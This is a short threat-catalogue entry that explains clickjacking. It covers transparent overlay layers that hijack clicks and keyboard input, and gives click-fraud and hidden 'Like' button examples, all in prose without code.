T 5.175 Clickjacking

Within the framework of a clickjacking attack, parts of a website are covered during display so that transparent layers the user cannot see superimpose the displayed website content.

Any content or controls can be integrated into these transparent layers without them being visible to the user. If the user clicks the alleged content of the website, the click is not sent to the visible layer, but to the superimposed layers and is therefore hijacked. The name of the attack clickjacking results from the combination of the words Click and Jacking derived from hijacking.

Along with mouse clicks, keyboard input can also be diverted to third party servers with the help of transparent displayed text boxes (e.g. positioned over password boxes).

Examples:

• An attacker participates in a scheme for advertisements where the amount of the commission is determined based on the clicks made by the users (click remuneration or pay-per-click). In so doing, he superimposes a part of the web application with an invisible link to the advertisement so that the user clicks the advertisement without noticing it. This increases the number of clicks and therefore the commission to be paid.
• An attacker places an invisible "Like" button for his/her own Facebook page on a website always following the mouse pointer. This is not discernible for the user. If the user clicks anywhere on the site, the "Like" function of Facebook is executed and he/she sends his/her Facebook data to the attacker who can further exploit it.